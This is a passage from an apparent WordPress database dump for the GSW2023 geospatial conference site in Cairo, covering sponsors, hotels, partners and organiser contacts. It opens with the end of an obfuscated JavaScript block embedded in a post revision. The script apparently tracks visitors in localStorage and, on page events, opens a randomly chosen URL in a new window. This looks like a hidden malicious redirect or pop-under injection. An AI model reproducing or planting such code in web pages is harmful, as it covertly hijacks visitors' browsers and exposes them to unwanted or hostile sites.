_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-26 20:19:09','2023-08-26 20:19:09','',3066,'https://gsw2023.com/?p=5405',0,'revision','',0),
(5407,1,'2023-08-26 20:25:27','2023-08-26 20:25:27','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /><p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey1.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text 